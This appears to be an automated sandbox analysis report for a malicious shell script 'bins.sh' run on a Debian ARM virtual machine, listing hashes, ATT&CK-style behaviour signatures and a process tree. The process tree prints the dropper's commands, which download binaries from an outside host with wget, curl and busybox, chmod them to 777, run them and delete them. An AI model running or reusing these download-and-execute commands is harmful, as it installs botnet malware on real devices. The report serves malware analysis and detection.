Resubmissions

16/12/2024, 04:16

241216-ev6w7stmdz 7

13/12/2024, 21:25

241213-z9pxfszqgq 9

Analysis

  • max time kernel
    598s
  • max time network
    313s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    16/12/2024, 04:16

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    7c06e835a83b81914ba9a19c15e66d76

  • SHA1

    bc618204890c0b179a00d6d253001a6e27197aa1

  • SHA256

    cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb

  • SHA512

    4bbe783a5be8061d432c7a90b941059b63a1adc687741621537fbde9f2631c045bccb8ef3d0fcbb9aac75dd15f9ab949678fd3c6b879b3e4ba7d74b585e5f9d2

  • SSDEEP

    192:IWWlW1WGWfWLWqVl9MT3rtdp2n3Viuz3WdNdGmX4spz3WdN8X4mWlW1WGWfWLWVh:jAtdp2n3Vi9GOMdp2n3Fu

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:641
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:643
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
      2⤵
      • System Network Configuration Discovery
        PID:645
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • System Network Configuration Discovery
        PID:655
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
      2⤵
      • System Network Configuration Discovery
        PID:811
    • /bin/chmod
      chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
      2⤵
      • File and Directory Permissions Modification
        PID:812
    • /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
      ./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
      2⤵
        PID:813
    • /bin/rm
      rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
      2⤵
        PID:814
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
      2⤵
      • System Network Configuration Discovery
        PID:815
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • System Network Configuration Discovery
        PID:816

Network

MITRE ATT&CK Enterprise v15